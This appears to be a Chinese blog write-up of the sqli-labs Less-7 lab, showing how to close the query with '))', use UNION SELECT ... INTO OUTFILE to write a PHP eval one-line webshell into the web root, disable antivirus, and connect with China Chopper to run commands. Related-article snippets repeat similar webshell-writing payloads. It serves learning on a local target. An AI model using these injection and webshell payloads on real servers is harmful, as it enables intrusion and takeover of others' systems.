Less-7使用的文件导出select ... into outfile ....,一个文件上传。

mysql安全配置里有一个配置secure_file_priv控制文件的导出导入。

secure_file_priv值的作用

  • 设置值为空,所有路径均可以导出导入。
  • 设置值为指定路径,只允许该路径的导出导入。
  • 设置值为Null,所有路径均不可导出导入。

    注意:默认是 Null



    可以使用命令set global secure_file_priv=进行修改,这里我们修改my.ini文件进行修改

在my.ini文件的 mysqld下方加入

修改完之后,重启mysql服务器,使用show variables like '%secure%'命令再次查看secure_file_priv的值是否成功修改





修改成功,开始实验

1.闭合sql语句

测试发现后端使用的sql语句查询是SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1



使用的是(('$id')),那么闭合方式就是id=1')) --+

这里找到了注入点,一般通过 order by 判断后可以直接使用 union select 语句进行查询,但是返回结果只有You are in.... Use outfile......You have an error in your SQL syntax ,也就是正确和错误,这一关可以使用sql盲注进行通过,为了学习,这里我们使用了mysql的一个文件上传

2.构造SQL语句写入一句话木马

select '内容' into outfile '路径'可以将内容到一个路径下

mysql测试:select 'nihao' into outfile 'C:\\phpstudy_pro\\www\\nihao.txt';



执行过这条语句后,会在c:\phpstudy_pro\www目录下生成一个nihao.txt的文件,内容为nihao

使用两个反斜杠\因为一个反斜杠是转义的意思,两个反斜杠才是一个反斜杠。

执行恶意SQL语句:http://127.0.0.1/sqli-labs-master/Less-7/?id=1')) union select 1,2,'<?php @eval($_POST[cmd])?>' into outfile 'C:\\phpstudy_pro\\www\\hacker.php'--+

如果这里是Windows电脑,需要关闭自带的杀毒,否者会被检测杀死我们的木马

执行后会在c:\phpstudy_pro\www目录下生成一个hacker.php的文件,这就是我们的一句话木马



内容为

3.使用中国菜刀,中国蚁剑链接,这里我们中国菜刀连接。

打开中国菜刀,右键 -> 添加



输入我们SQL注入靶机的IP,连接密码为cmd,点击添加,进行连接



右键我们添加的靶机

  • 文件管理是看靶机的大概文件结构
  • 虚拟终端是进入靶机的命令行

我们点击虚拟终端,执行cmd命令whoami



成功获取靶机权限。盲注不在演示不走,和Less-5和Less-7类似

注意:这里获取靶机的权限是服务器以哪个用户身份运行的权限。

Less-7 '))闭合 和 secure_file_priv 配置写入一句话木马的更多相关文章

  1. 通过mysql写入一句话木马

    USE mysql;# MySQL 返回的查询结果为空(即零行). # MySQL 返回的查询结果为空(即零行). CREATE TABLE a( cmd1 text NOT NULL );# MyS ...

  2. 通过mysql写入php一句话木马

    利用mysql写入一句话木马 前提: root权限,知道了服务器的web的绝对路径 select "<?php @eval($_POST['pass']);?>" IN ...

  3. PHP 一句话木马

    eval 函数 eval() 函数把字符串按照 PHP 代码来计算 该字符串必须是合法的 PHP 代码,且必须以分号结尾 如果没有在代码字符串中调用 return 语句,则返回 NULL.如果代码中存 ...

  4. 渗透技术--SQL注入写一句话木马原理

    讲一下SQL注入中写一句话拿webshell的原理,主要使用的是 SELECT ... INTO OUTFILE 这个语句,下面是一个语句的例子: SELECT * INTO OUTFILE 'C:\ ...

  5. 探索基于.NET下实现一句话木马之asmx篇

    0x01 前言 上篇介绍了一般处理程序(ashx)的工作原理以及实现一句话木马的过程,今天接着介绍Web Service程序 (asmx)下的工作原理和如何实现一句话木马,当然介绍之前笔者找到了一款a ...

  6. 探索基于.NET下实现一句话木马之ashx篇

    0x01 前言 在渗透测试的时候各种PHP版的一句话木马已经琳琅满目,而.NET平台下的一句话木马则百年不变,最常见的当属下面这句 笔者感觉有必要挖坑一下.NET平台里的一句话木马,经过一番摸索填坑终 ...

  7. 技术的正宗与野路子 c#, AOP动态代理实现动态权限控制(一) 探索基于.NET下实现一句话木马之asmx篇 asp.net core 系列 9 环境(Development、Staging 、Production)

    黄衫女子的武功似乎与周芷若乃是一路,飘忽灵动,变幻无方,但举手抬足之间却是正而不邪,如说周芷若形似鬼魅,那黄衫女子便是态拟神仙. 这段描写出自<倚天屠龙记>第三十八回. “九阴神抓”本是& ...

  8. 如何自己写aspx过狗D盾一句话木马

    hi,我是凉风,(以下内容纯属个人见解,如有不同的意见欢迎回复指出) ,本菜比发现aspx过狗的姿势不常见,不像php一样一抓一大把,于是我决定研究一下aspx 本文作者:i春秋签约作家——凉风 引用 ...

  9. CTF-PHP一句话木马

    首先看一下题目 他是提示让你输入一个4位数的密码 使用burp进行密码爆破 我们使用burp来自动生成一个所有以4位数组成的密码 经过一段时间的爆破发现他的返回值都为192个字节,无法区别正确的密码. ...

  10. web攻防环境--一句话木马

    任务一.基于centos7搭建dvwa web服务靶机 1.在centos7安装LAMP并启动,访问phpinfo页面 也即安装httpd.php.mysql服务. 直接进行yum安装即可,完成后检查 ...

随机推荐

  1. python_列表和元组的转换

    1, 通过list函数将元组的数据获取到,保存到新定义的列表里面.备注:元组的数据不会更改. info_tuple = ("小明", 24, 1.75) info_list = l ...

  2. 第九章 MySQL 高可用(MHA)

    MySQL 高可用(MHA) 一 MHA高可用部署 需要使用的前提: 当普通主从复制不能满足我们的需求,  主节点宕机  影响业务的不间断运行.这里就需要用到MHA 高可用 1. MHA高可用的介绍 ...

  3. 第八章 mysql的主从复制

    mysql的主从复制 一 主从复制搭建 1. 准备三台主机  (这个是多实例) 3307 master3308 salve13309 salve2 2. master 节点设置 [mysqld] lo ...

  4. Android Studio实现数据库的所有操作

    采用android studio自带的数据库实现stu数据库和stu表的创建,增删改查和关闭 这是项目的大致结构 主界面 子界面 布局源码 <!-- Main --> <?xml v ...

  5. 机器学习——常见的backbone

    参考链接:https://www.zhihu.com/question/396811409/answer/1252521120 LeNet:5层轻量级网络,一般用来验证小型数据: AlexNet/VG ...

  6. 手动导入jar

    mvn install:install-file -Dfile=D:\java_tools\maven\maven-repository\cn\afterturn\easypoi-base-cy\4. ...

  7. list与linkedlist(添加、删除元素)

    1)jdk1.8中list遍历过程中可以直接删除元素了(jdk1.7可以通过倒序遍历删除或iterator遍历删除元素) List<Integer> list = new ArrayLis ...

  8. C# 自定义组元扩展类(Tuple)

    组元Tuple没有构造函数,自定义一个有构造函数的组元TupleEx. namespace TupleEx { public class TupleEx<T1> { /// <sum ...

  9. 机器学习实战—搭建BP神经网络实现手写数字识别

    看了几天的BP神经网络,总算是对它有一点点的理解了.今天就用python搭建了一个模型来实现手写数字的识别. 一.BP神经网络简介 BP(back propagation)神经网络是一种按照误差逆向传 ...

  10. 修改mysql root密码,在workbench中导入.sql文件

    修改mysql root密码: 1.如果没有配置环境变量,在 \Program Files\MySQL\MySQL Server 8.0\bin 文件下 Shit+右键打开 Powershell 窗口 ...